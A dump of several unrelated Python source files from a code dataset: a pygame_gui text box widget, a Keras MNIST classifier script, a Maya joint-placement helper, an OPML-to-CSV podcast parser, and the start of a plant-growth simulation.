the text (say, with a scroll bar) without actually changing the text itself.\n \"\"\"\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n\n drawable_area = pygame.Rect((0, height_adjustment), (self.text_wrap_rect[2], self.text_wrap_rect[3]))\n self.image = pygame.Surface(self.rect.size, flags=pygame.SRCALPHA)\n self.image.fill(pygame.Color(0, 0, 0, 0))\n self.image.blit(self.background_surf, (0, 0))\n self.image.blit(self.formatted_text_block.block_sprite, (self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset,\n self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n drawable_area)\n\n def redraw_from_chunks(self):\n \"\"\"\n Redraws from slightly earlier in the process than 'redraw_from_text_block'. Useful if we have redrawn\n individual chunks already (say, to change their style slightly after being hovered) and now want to update the\n text block with those changes without doing a full redraw.\n\n This won't work very well if redrawing a chunk changed it's dimensions.\n \"\"\"\n self.formatted_text_block.redraw_from_chunks(self.active_text_effect)\n self.redraw_from_text_block()\n\n def full_redraw(self):\n \"\"\"\n Trigger a full redraw of the entire text box. Useful if we have messed with the text chunks in a more\n fundamental fashion and need to reposition them (say, if some of them have gotten wider after being made bold).\n\n NOTE: This doesn't re-parse the text of our box. If you need to do that, just create a new text box.\n\n \"\"\"\n self.formatted_text_block.redraw(self.active_text_effect)\n self.redraw_from_text_block()\n self.link_hover_chunks = []\n self.formatted_text_block.add_chunks_to_hover_group(self.link_hover_chunks)\n\n def select(self):\n \"\"\"\n Called when we focus select the text box (usually by clicking on it). In this case we just pass the focus over\n to the box's scroll bar, if it has one, so that some input events will be directed that way.\n \"\"\"\n if self.scroll_bar is not None:\n self.scroll_bar.select()\n\n def process_event(self, event: pygame.event.Event) -> bool:\n \"\"\"\n Deals with input events. In this case we just handle clicks on any links in the text.\n\n :param event: A pygame event to check for a reaction to.\n :return bool: Returns True if we made use of this event.\n \"\"\"\n processed_event = False\n should_redraw_from_chunks = False\n should_full_redraw = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n mouse_x, mouse_y = event.pos\n if self.rect.collidepoint(mouse_x, mouse_y):\n processed_event = True\n if self.scroll_bar is not None:\n text_block_full_height = self.formatted_text_block.final_dimensions[1]\n height_adjustment = self.scroll_bar.start_percentage * text_block_full_height\n else:\n height_adjustment = 0\n base_x = (self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset)\n base_y = (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset - height_adjustment)\n for chunk in self.link_hover_chunks:\n\n hover_rect = pygame.Rect((base_x + chunk.rect.x,\n base_y + chunk.rect.y),\n chunk.rect.size)\n if hover_rect.collidepoint(mouse_x, mouse_y):\n processed_event = True\n if not chunk.is_selected:\n chunk.on_selected()\n if chunk.metrics_changed_after_redraw:\n should_full_redraw = True\n else:\n should_redraw_from_chunks = True\n\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n base_x = (self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset)\n base_y = (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset - height_adjustment)\n mouse_x, mouse_y = event.pos\n for chunk in self.link_hover_chunks:\n\n hover_rect = pygame.Rect((base_x + chunk.rect.x,\n base_y + chunk.rect.y),\n chunk.rect.size)\n if hover_rect.collidepoint(mouse_x, mouse_y):\n if self.rect.collidepoint(mouse_x, mouse_y):\n processed_event = True\n if chunk.is_selected:\n link_clicked_event = pygame.event.Event(pygame.USEREVENT,\n {'user_type': 'ui_text_box_link_clicked',\n 'link_target': chunk.link_href,\n 'ui_element': self,\n 'ui_object_id': self.object_ids[-1]})\n pygame.event.post(link_clicked_event)\n\n if chunk.is_selected:\n chunk.on_unselected()\n if chunk.metrics_changed_after_redraw:\n should_full_redraw = True\n else:\n should_redraw_from_chunks = True\n\n if should_redraw_from_chunks:\n self.redraw_from_chunks()\n\n if should_full_redraw:\n self.full_redraw()\n\n return processed_event\n\n def set_active_effect(self, effect_name: Union[str, None]):\n \"\"\"\n Set an animation effect to run on the text box. The effect will start running immediately after this call.\n\n These effects are currently supported:\n\n - 'typing_appear' - Will look as if the text is being typed in.\n - 'fade_in' - The text will fade in from the background colour (Only supported on Pygame 2)\n - 'fade_out' - The text will fade out to the background colour (only supported on Pygame 2)\n\n :param effect_name: The name fo the t to set. If set to None instead it will cancel any active effect.\n \"\"\"\n if effect_name is None:\n self.active_text_effect = None\n elif type(effect_name) is str:\n if effect_name == 'typing_appear':\n effect = TypingAppearEffect(self.formatted_text_block.characters)\n self.active_text_effect = effect\n self.full_redraw()\n elif effect_name == 'fade_in':\n effect = FadeInEffect(self.formatted_text_block.characters)\n self.active_text_effect = effect\n self.redraw_from_chunks()\n elif effect_name == 'fade_out':\n effect = FadeOutEffect(self.formatted_text_block.characters)\n self.active_text_effect = effect\n self.redraw_from_chunks()\n else:\n warnings.warn('Unsupported effect name: ' + effect_name + ' for text box')\n\n def rebuild_from_changed_theme_data(self):\n \"\"\"\n Called by the UIManager to check the theming data and rebuild whatever needs rebuilding for this element when\n the theme data has changed.\n \"\"\"\n has_any_changed = False\n\n # misc parameters\n shape_type = 'rectangle'\n shape_type_string = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'shape')\n if shape_type_string is not None:\n if shape_type_string in ['rectangle', 'rounded_rectangle']:\n shape_type = shape_type_string\n if shape_type != self.shape_type:\n self.shape_type = shape_type\n has_any_changed = True\n\n corner_radius = 2\n shape_corner_radius_string = self.ui_theme.get_misc_data(self.object_ids,\n self.element_ids, 'shape_corner_radius')\n if shape_corner_radius_string is not None:\n try:\n corner_radius = int(shape_corner_radius_string)\n except ValueError:\n corner_radius = 2\n if corner_radius != self.shape_corner_radius:\n self.shape_corner_radius = corner_radius\n has_any_changed = True\n\n border_width = 0\n border_width_string = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'border_width')\n if border_width_string is not None:\n try:\n border_width = int(border_width_string)\n except ValueError:\n border_width = 0\n\n if border_width != self.border_width:\n self.border_width = border_width\n has_any_changed = True\n\n shadow_width = 0\n shadow_width_string = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'shadow_width')\n if shadow_width_string is not None:\n try:\n shadow_width = int(shadow_width_string)\n except ValueError:\n shadow_width = 0\n if shadow_width != self.shadow_width:\n self.shadow_width = shadow_width\n has_any_changed = True\n\n padding = (10, 10)\n padding_str = self.ui_theme.get_misc_data(self.object_ids, self.element_ids, 'padding')\n if padding_str is not None:\n try:\n padding = (int(padding_str.split(',')[0]), int(padding_str.split(',')[1]))\n except ValueError:\n padding = (10, 10)\n if padding != self.padding:\n self.padding = padding\n has_any_changed = True\n\n # colour parameters\n background_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'dark_bg')\n if background_colour != self.background_colour:\n self.background_colour = background_colour\n has_any_changed = True\n\n border_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'normal_border')\n if border_colour != self.border_colour:\n self.border_colour = border_colour\n has_any_changed = True\n\n # link styles\n link_normal_underline = True\n link_normal_underline_string = self.ui_theme.get_misc_data(self.object_ids,\n self.element_ids, 'link_normal_underline')\n if link_normal_underline_string is not None:\n try:\n link_normal_underline = bool(int(link_normal_underline_string))\n except ValueError:\n link_normal_underline = True\n if link_normal_underline != self.link_normal_underline:\n self.link_normal_underline = link_normal_underline\n\n link_hover_underline = True\n link_hover_underline_string = self.ui_theme.get_misc_data(self.object_ids,\n self.element_ids, 'link_hover_underline')\n if link_hover_underline_string is not None:\n try:\n link_hover_underline = bool(int(link_hover_underline_string))\n except ValueError:\n link_hover_underline = True\n if link_hover_underline != self.link_hover_underline:\n self.link_hover_underline = link_hover_underline\n\n link_normal_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'link_text')\n if link_normal_colour != self.link_normal_colour:\n self.link_normal_colour = link_normal_colour\n\n link_hover_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'link_hover')\n if link_hover_colour != self.link_hover_colour:\n self.link_hover_colour = link_hover_colour\n\n link_selected_colour = self.ui_theme.get_colour_or_gradient(self.object_ids, self.element_ids, 'link_selected')\n if link_selected_colour != self.link_selected_colour:\n self.link_selected_colour = link_selected_colour\n\n link_style = {'link_text': self.link_normal_colour,\n 'link_hover': self.link_hover_colour,\n 'link_selected': self.link_selected_colour,\n 'link_normal_underline': self.link_normal_underline,\n 'link_hover_underline': self.link_hover_underline}\n\n if link_style != self.link_style:\n self.link_style = link_style\n has_any_changed = True\n\n if has_any_changed:\n self.rebuild()\n\n\nclass StyledChunk:\n def __init__(self, font_size, font_name, chunk, style,\n color, bg_color, is_link, link_href, link_style, position: Tuple[int, int], font_dictionary):\n self.style = style\n self.chunk = chunk\n self.font_size = font_size\n self.font_name = font_name\n self.is_link = is_link\n self.link_href = link_href\n self.link_style = link_style\n\n self.font = font_dictionary.find_font(font_size, font_name, self.style.bold, self.style.italic)\n\n if self.is_link:\n self.normal_colour = self.link_style['link_text']\n self.hover_colour = self.link_style['link_hover']\n self.selected_colour = self.link_style['link_selected']\n self.link_normal_underline = self.link_style['link_normal_underline']\n self.link_hover_underline = self.link_style['link_hover_underline']\n else:\n self.normal_colour = color\n self.hover_colour = None\n self.selected_colour = None\n self.link_normal_underline = False\n self.link_hover_underline = False\n\n self.color = self.normal_colour\n self.bg_color = bg_color\n self.position = position\n\n self.is_hovered = False\n self.is_selected = False\n\n if self.style.underline or (self.is_hovered and self.link_hover_underline) or\\\n (self.link_normal_underline and not self.is_hovered):\n self.font.set_underline(True)\n\n if len(self.chunk) > 0:\n if type(self.bg_color) == ColourGradient or self.bg_color.a != 255:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color, self.bg_color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n self.rendered_chunk = pygame.Surface((0, 0))\n metrics = self.font.metrics(self.chunk)\n self.ascent = self.font.get_ascent()\n self.width = self.font.size(self.chunk)[0]\n self.height = self.font.size(self.chunk)[1]\n self.advance = 0\n for i in range(0, len(self.chunk)):\n if len(metrics[i]) == 5:\n self.advance += metrics[i][4]\n\n self.rect = pygame.Rect(self.position, (self.width, self.height))\n self.metrics_changed_after_redraw = False\n\n self.unset_underline_style()\n\n def unset_underline_style(self):\n self.font.set_underline(False)\n\n def redraw(self):\n if self.style.underline or (self.is_hovered and self.link_hover_underline) or \\\n (self.link_normal_underline and not self.is_hovered):\n self.font.set_underline(True)\n\n if len(self.chunk) > 0:\n if type(self.bg_color) == ColourGradient or self.bg_color.a != 255:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n if type(self.color) != ColourGradient:\n self.rendered_chunk = self.font.render(self.chunk, True, self.color, self.bg_color)\n else:\n self.rendered_chunk = self.font.render(self.chunk, True, pygame.Color('#FFFFFFFF'))\n self.color.apply_gradient_to_surface(self.rendered_chunk)\n else:\n self.rendered_chunk = pygame.Surface((0, 0))\n\n self.font.set_underline(False)\n\n new_metrics = self.font.metrics(self.chunk)\n new_ascent = self.font.get_ascent()\n new_width = self.font.size(self.chunk)[0]\n new_height = self.font.size(self.chunk)[1]\n new_advance = 0\n for i in range(0, len(self.chunk)):\n if len(new_metrics[i]) == 5:\n new_advance += new_metrics[i][4]\n\n if (new_ascent != self.ascent or new_width != self.width) or (\n new_height != self.height or new_advance != self.advance):\n self.metrics_changed_after_redraw = True\n self.ascent = new_ascent\n self.width = new_width\n self.height = new_height\n self.advance = new_advance\n self.rect = pygame.Rect(self.position, (self.width, self.height))\n else:\n self.metrics_changed_after_redraw = False\n\n def on_hovered(self):\n if not self.is_selected:\n self.color = self.hover_colour\n self.is_hovered = True\n self.redraw()\n\n def on_unhovered(self):\n if not self.is_selected:\n self.color = self.normal_colour\n self.is_hovered = False\n self.redraw()\n\n def on_selected(self):\n self.color = self.selected_colour\n self.is_selected = True\n self.redraw()\n\n def on_unselected(self):\n self.color = self.normal_colour\n self.is_selected = False\n self.redraw()\n\n\nclass TextBlock:\n\n class TextLine:\n def __init__(self):\n self.chunks = []\n self.max_line_char_height = 0\n self.max_line_ascent = 0\n\n def __init__(self, text, rect_or_pos, indexed_styles, font_dict, link_style, bg_colour, wrap_to_height=False):\n self.characters = text\n if len(rect_or_pos) == 2:\n self.position = rect_or_pos\n self.width = -1\n self.height = -1\n else:\n self.position = (rect_or_pos[0], rect_or_pos[1])\n self.width = rect_or_pos[2]\n if wrap_to_height:\n self.height = rect_or_pos[3]\n else:\n self.height = -1\n\n self.indexed_styles = indexed_styles\n self.block_sprite = None\n self.font_dict = font_dict\n\n self.final_dimensions = (rect_or_pos[2], rect_or_pos[3])\n\n self.link_style = link_style\n\n self.bg_colour = bg_colour\n\n self.lines = []\n self.redraw(None)\n\n def redraw(self, text_effect):\n \"\"\"\n Takes our parsed text and the styles generated from that parsing and builds rendered 'chunks' out of them\n that are then blitted onto a final surface containing all our drawn text.\n \"\"\"\n self.lines = []\n if text_effect:\n end_text_position = text_effect.get_end_text_pos()\n else:\n end_text_position = len(self.characters)\n\n lines_of_chunks = []\n chunk_line = []\n start_style_key = 0\n keys = [key for key in list(self.indexed_styles.keys()) if key <= end_text_position]\n keys.append(end_text_position)\n max_line_ascent = 0\n for end_style_key in keys:\n if end_style_key != 0:\n text = self.characters[start_style_key:end_style_key]\n chunk = [text, self.indexed_styles[start_style_key]]\n chunk_font = self.font_dict.find_font(chunk[1].font_size,\n chunk[1].font_name,\n chunk[1].style.bold,\n chunk[1].style.italic)\n chunk_ascent = chunk_font.get_ascent()\n if chunk_ascent > max_line_ascent:\n max_line_ascent = chunk_ascent\n if chunk[0] == '\\n':\n if len(chunk_line) == 0:\n lines_of_chunks.append([max_line_ascent, [['', chunk[1]]]])\n else:\n lines_of_chunks.append([max_line_ascent, chunk_line])\n chunk_line = []\n max_line_ascent = 0\n else:\n chunk_line.append(chunk)\n\n start_style_key = end_style_key\n\n if len(chunk_line) > 0:\n lines_of_chunks.append([max_line_ascent, chunk_line])\n\n if self.width != -1:\n line_index = 0\n while line_index < len(lines_of_chunks):\n line = lines_of_chunks[line_index][1]\n line_render_length = 0\n split_point = -1\n chunk_index = 0\n chunk_to_split_index = 0\n chunk_length = 0\n for chunk in line:\n font = self.font_dict.find_font(chunk[1].font_size,\n chunk[1].font_name,\n chunk[1].style.bold,\n chunk[1].style.italic)\n\n metrics = font.metrics(chunk[0])\n chunk_length = font.size(chunk[0])[0]\n line_render_length += chunk_length\n if line_render_length > self.width:\n char_line_length = line_render_length - chunk_length\n for i in range(0, len(metrics)):\n advance = metrics[i][4]\n char_line_length += advance\n if char_line_length > self.width:\n # splitting time\n chunk_to_split_index = chunk_index\n split_point = i\n break\n if split_point != -1:\n break\n chunk_index += 1\n\n if split_point != -1:\n word_split_point = 0\n chunk_to_split = line[chunk_to_split_index]\n for i in range(split_point, 0, -1):\n if chunk_to_split[0][i] == ' ':\n word_split_point = i\n break\n if word_split_point == 0 and chunk_to_split_index == 0 and chunk_length > self.width:\n # our chunk is one word, at the start of the line, and the split point is in it, so split the\n # word instead of hunting for a word split point\n if split_point > 0:\n chunk_1 = [chunk_to_split[0][:split_point-1] + '-', chunk_to_split[1]]\n chunk_2 = [\"-\" + chunk_to_split[0][split_point-1:].lstrip(' '), chunk_to_split[1]]\n\n chunk_2_font = self.font_dict.find_font(chunk_2[1].font_size,\n chunk_2[1].font_name,\n chunk_2[1].style.bold,\n chunk_2[1].style.italic)\n chunk_2_ascent = chunk_2_font.get_ascent()\n\n lines_of_chunks[line_index][1][chunk_to_split_index] = chunk_1\n new_line = [chunk_2_ascent, [chunk_2]]\n\n chunk_length_of_line = len(lines_of_chunks[line_index][1])\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n remaining_chunk = lines_of_chunks[line_index][1][remaining_chunk_index]\n new_line[1].append(remaining_chunk)\n\n remaining_chunk_font = self.font_dict.find_font(remaining_chunk[1].font_size,\n remaining_chunk[1].font_name,\n remaining_chunk[1].style.bold,\n remaining_chunk[1].style.italic)\n remaining_chunk_ascent = remaining_chunk_font.get_ascent()\n if remaining_chunk_ascent > new_line[0]:\n new_line[0] = remaining_chunk_ascent\n\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n lines_of_chunks[line_index][1].pop()\n\n lines_of_chunks.insert(line_index + 1, new_line)\n\n else:\n chunk_1 = [chunk_to_split[0][:word_split_point], chunk_to_split[1]]\n chunk_2 = [chunk_to_split[0][word_split_point:].lstrip(' '), chunk_to_split[1]]\n\n chunk_2_font = self.font_dict.find_font(chunk_2[1].font_size,\n chunk_2[1].font_name,\n chunk_2[1].style.bold,\n chunk_2[1].style.italic)\n chunk_2_ascent = chunk_2_font.get_ascent()\n\n lines_of_chunks[line_index][1][chunk_to_split_index] = chunk_1\n new_line = [chunk_2_ascent, [chunk_2]]\n\n chunk_length_of_line = len(lines_of_chunks[line_index][1])\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n remaining_chunk = lines_of_chunks[line_index][1][remaining_chunk_index]\n new_line[1].append(remaining_chunk)\n\n remaining_chunk_font = self.font_dict.find_font(remaining_chunk[1].font_size,\n remaining_chunk[1].font_name,\n remaining_chunk[1].style.bold,\n remaining_chunk[1].style.italic)\n remaining_chunk_ascent = remaining_chunk_font.get_ascent()\n if remaining_chunk_ascent > new_line[0]:\n new_line[0] = remaining_chunk_ascent\n\n for remaining_chunk_index in range(chunk_to_split_index + 1, chunk_length_of_line):\n lines_of_chunks[line_index][1].pop()\n\n lines_of_chunks.insert(line_index+1, new_line)\n line_index += 1\n\n surface = None\n surface_width = self.width\n surface_height = self.height\n if self.height != -1 and self.width != -1:\n surface = pygame.Surface((self.width, self.height), pygame.SRCALPHA)\n\n position = [0, 0]\n line_height_acc = 0\n max_line_length = 0\n for line in lines_of_chunks:\n line_chunks = []\n max_line_char_height = 0\n max_line_ascent = 0\n for chunk in line[1]:\n new_chunk = StyledChunk(chunk[1].font_size,\n chunk[1].font_name,\n chunk[0],\n chunk[1].style,\n chunk[1].color,\n chunk[1].bg_color,\n chunk[1].is_link,\n chunk[1].link_href,\n self.link_style,\n (position[0], position[1]),\n self.font_dict)\n position[0] += new_chunk.advance\n if new_chunk.height > max_line_char_height:\n max_line_char_height = new_chunk.height\n if new_chunk.ascent > max_line_ascent:\n max_line_ascent = new_chunk.ascent\n line_chunks.append(new_chunk)\n\n if surface is not None:\n # need to adjust y start pos based on ascents\n chunk_rect = new_chunk.rect\n adjust = line[0] - new_chunk.ascent\n chunk_rect.y += adjust\n surface.blit(new_chunk.rendered_chunk, chunk_rect)\n\n text_line = TextBlock.TextLine()\n text_line.chunks = line_chunks\n text_line.max_line_ascent = max_line_ascent\n self.lines.append(text_line)\n\n position[0] = 0\n position[1] += max_line_char_height\n line_height_acc += max_line_char_height\n\n if surface is None:\n if self.width == -1:\n surface_width = max_line_length\n else:\n surface_width = self.width\n if self.height == -1:\n surface_height = line_height_acc\n else:\n surface_height = self.height\n\n surface = pygame.Surface((surface_width, surface_height), pygame.SRCALPHA)\n\n for line in self.lines:\n for chunk in line.chunks:\n # need to adjust y start pos based on ascents\n chunk_rect = chunk.rect\n adjust = line.max_line_ascent - chunk.ascent\n chunk_rect.y += adjust\n surface.blit(chunk.rendered_chunk, chunk_rect)\n\n self.block_sprite = surface\n self.final_dimensions = [surface_width, surface_height]\n self.width = surface_width\n self.height = surface_height\n\n def redraw_from_chunks(self, text_effect):\n if text_effect:\n final_alpha = text_effect.get_final_alpha()\n else:\n final_alpha = 255\n\n self.block_sprite = pygame.Surface((self.width, self.height), flags=pygame.SRCALPHA)\n\n if type(self.bg_colour) == ColourGradient:\n self.block_sprite.fill(pygame.Color(\"#FFFFFFFF\"))\n self.bg_colour.apply_gradient_to_surface(self.block_sprite)\n else:\n self.block_sprite.fill(self.bg_colour)\n\n for text_line in self.lines:\n for chunk in text_line.chunks:\n if self.block_sprite is not None:\n if final_alpha != 255:\n self.block_sprite.blit(chunk.rendered_chunk, chunk.rect)\n else:\n self.block_sprite.blit(chunk.rendered_chunk, chunk.rect)\n self.block_sprite.set_alpha(final_alpha)\n\n def add_chunks_to_hover_group(self, hover_group):\n for line in self.lines:\n for chunk in line.chunks:\n if chunk.is_link:\n hover_group.append(chunk)\n\n def draw(self, surface):\n surface.blit(self.block_sprite, self.position)\n","sub_path":"pygame_gui/elements/ui_text_box.py","file_name":"ui_text_box.py","file_ext":"py","file_size_in_byte":51074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"93035835","text":"from tensorflow import keras\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, Activation, BatchNormalization, AveragePooling2D\nfrom tensorflow.keras.optimizers import SGD, RMSprop, Adam\nfrom PIL import Image\nimport time\nimport tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom sklearn.metrics import confusion_matrix\nimport itertools\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nimport pandas as pd\n\n\n\ndef prRes(str1):\n list_of_files = os.listdir(str1)\n for file in list_of_files:\n image_file_name = os.path.join(str1, file)\n if \".jpg\" in image_file_name:\n print(\"Правильный ответ:\" +str(image_file_name.split(\"content/\")[1].split(\"/\")[1].split(\".\")[0])+ \"--- Полученный ответ: \" + str(mlp_digits_predict(model, image_file_name)))\n \ndef load_images_to_data(image_label, image_directory, features_data, label_data):\n list_of_files = os.listdir(image_directory)\n for file in list_of_files:\n image_file_name = os.path.join(image_directory, file)\n if \".png\" in image_file_name:\n img = Image.open(image_file_name).convert(\"L\")\n img = np.resize(img, (28,28,1))\n im2arr = np.array(img)\n im2arr = im2arr.reshape(1, 28, 28, 1)\n features_data = np.append(features_data, im2arr, axis=0)\n label_data = np.append(label_data, [image_label], axis=0)\n return features_data, label_data\n\ndef mlp_digits_predict(model, image_file):\n img = keras.preprocessing.image.load_img(image_file, target_size=(28, 28), color_mode='grayscale')\n img_arr = np.expand_dims(img, axis=0)\n img_arr = 1 - img_arr/255.0\n img_arr = img_arr.reshape((1, 28, 28, 1))\n result = model.predict_classes([img_arr])\n return result[0]\n\ndef mnist_make_model(image_w: int, image_h: int): \n num_classes = 10 \n model = Sequential()\n model.add(Conv2D(filters=32, kernel_size=(3,3), activation='relu',padding='same',\n input_shape=(28, 28, 1)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',padding='same'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',padding='same'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Flatten())\n # Densely connected layers\n model.add(Dense(128, activation='relu'))\n # Output layer\n model.add(Dense(num_classes, activation='softmax'))\n model.compile(optimizer=Adam(), loss='categorical_crossentropy',metrics=['accuracy'])\n return model\n\ndef mnist_mlp_train(model):\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n x_train = np.reshape(x_train,(x_train.shape[0], 28, 28, 1)).astype('float32')/255.0\n x_test = np.reshape(x_test,(x_test.shape[0], 28, 28, 1)).astype('float32')/255.0\n y_train = keras.utils.to_categorical(y_train, 10)\n y_test = keras.utils.to_categorical(y_test, 10)\n model.fit(x_train, y_train, epochs=15, batch_size=64)\n\ndef confusion_matrix(model):\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n x_train = np.reshape(x_train,(x_train.shape[0], 28, 28, 1)).astype('float32')/255.0\n x_test = np.reshape(x_test,(x_test.shape[0], 28, 28, 1)).astype('float32')/255.0\n classes = [0,1,2,3,4,5,6,7,8,9]\n y_pred=model.predict_classes(x_test)\n con_mat = tf.math.confusion_matrix(labels=y_test, predictions=y_pred).numpy()\n con_mat_norm = np.around(con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis], decimals=2)\n con_mat_df = pd.DataFrame(con_mat_norm,\n index = classes, \n columns = classes)\n figure = plt.figure(figsize=(8, 8))\n sns.heatmap(con_mat_df, annot=True,cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.show()\n\np = os.path.abspath('/content/mlp_digits_28x28.h5')\nmodel = tf.keras.models.load_model(p)\n\nconfusion_matrix(model)\n\nimage_directory = \"/content/img/\"\nprRes(image_directory)\nprint()\n\nprint(\"my data\")\nimage_directory1 = \"/content/mytestimg/1/\"\nprRes(image_directory1)\n","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519549907","text":"'''\nCreated on Feb 11, 2013\n\n@author: jamesd\n'''\nimport maya.cmds as cmds\n\ndef BD_jointsOnCurve(curveName = []):\n \"\"\"\n Create a joint at each point for the curves in the supplied list\n \"\"\"\n for nurbsCurve in curveName:\n getDegree = cmds.getAttr(nurbsCurve + '.degree')\n getSpans = cmds.getAttr(nurbsCurve + '.spans')\n numPoints = int(getDegree) + int(getSpans)\n for x in range (numPoints):\n if x < 10:\n padding = '00'\n elif x <100:\n padding = '0'\n else:\n padding = ''\n getCVLoc = cmds.xform('%s.cv[%s]' % (nurbsCurve , x), q= True, translation = True)\n cmds.joint(n = '%s_%s%s_cluster' % (nurbsCurve, padding, x), position = getCVLoc)","sub_path":"BDmaya/tools_rig/modules/BD_jointsOnCurve.py","file_name":"BD_jointsOnCurve.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"478465960","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport io\nimport csv\nfrom xml.etree import ElementTree\n\n\nclass PodcastListToCSV(object):\n\n def __init__(self, outputFile):\n self.writer = csv.writer(outputFile, quoting=csv.QUOTE_NONNUMERIC)\n self.group_name = \"\"\n\n def start(self, tag, attrib):\n if tag != \"outline\":\n return\n if not attrib.get(\"xmlUrl\"):\n self.group_name = attrib[\"text\"]\n else:\n self.writer.writerow((\n self.group_name,\n attrib[\"text\"],\n attrib[\"xmlUrl\"],\n attrib.get(\"htmlUrl\", \"\"),\n ))\n\n def end(self, tag):\n \"\"\"Ignore closing tags\"\"\"\n\n def data(self, data):\n \"\"\"Ignore data inside nodes\"\"\"\n\n def close(self):\n \"\"\"Nothing special to do here\"\"\"\n\n\ndef main():\n opml_filename = os.path.join(\"..\", \"podcasts.opml\")\n\n target = PodcastListToCSV(sys.stdout)\n parser = ElementTree.XMLParser(target=target)\n\n with open(opml_filename, \"rt\") as f:\n for line in f:\n parser.feed(line)\n parser.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"standard/038.xml.etree/create_custom_tree_builder/etree_podcast_csv_treebuilder.py","file_name":"etree_podcast_csv_treebuilder.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"175049436","text":"import namedenum ; reload(namedenum)\nfrom namedenum import enum\nimport numpy as np\n\ngutypes = enum('ShortGU', 'LongGU', 'Inflo', 'TrunkGU')\ngufate = enum('Proleptic','Sylleptic','Blind')\n\ndef is_sylleptic(gufate):\n return gufate == Sylleptic\n\ndef is_proleptic(gufate):\n return gufate == Proleptic\n \n\n \n\n\nsucessiontypes = [ShortGU, LongGU, Inflo]\nsuccessionmatrix = [[0.6, 0.0, 0.4],\n [0.35, 0.25, 0.4],\n [0.95, 0.05, 0]\n ]\n#from random import uniform, seed\nfrom numpy import cumsum\nfrom numpy.random import uniform\n\n\ndef realization_in_probaranges(probas):\n cumsum_probs = cumsum(probas)\n totalprob = cumsum_probs[-1]\n cumsum_probs /= totalprob\n assert abs(cumsum_probs[-1] -1) < 1e-5\n unif_realization = float( uniform(0,1) )\n i = 0\n while unif_realization >= cumsum_probs[i] : i += 1\n return i\n\ndef succession(gutype, successionmatrix = successionmatrix):\n if gutype == TrunkGU : return LongGU\n probas = successionmatrix[gutype]\n return sucessiontypes[realization_in_probaranges(probas)]\n\n\n\ndef normalize(matrix):\n def nml(a):\n s = sum(a)\n return a/s\n matrix = np.array(matrix)\n return np.array([nml(probas) for probas in matrix])\n \nlateralfates = [Blind, Proleptic, Sylleptic]\nbranchingmatrixfate = normalize([\n [0.4,0.6,0],\n [0.3,0.7,0],\n [0.4,0.6,0],\n [0.7,0.3,0],\n [0.4,0.25,0.35],\n [0.4,0.25,0.35],\n [0.35,0.2,0.45],\n [0.35,0.3,0.35],\n [0.3,0.55,0.15],\n [0.65,0.35,0]\n])\n\n\nlateraltypes = [ShortGU, LongGU, Inflo]\nbranchingmatrixtype = normalize([\n [0.5,0.5,0],\n 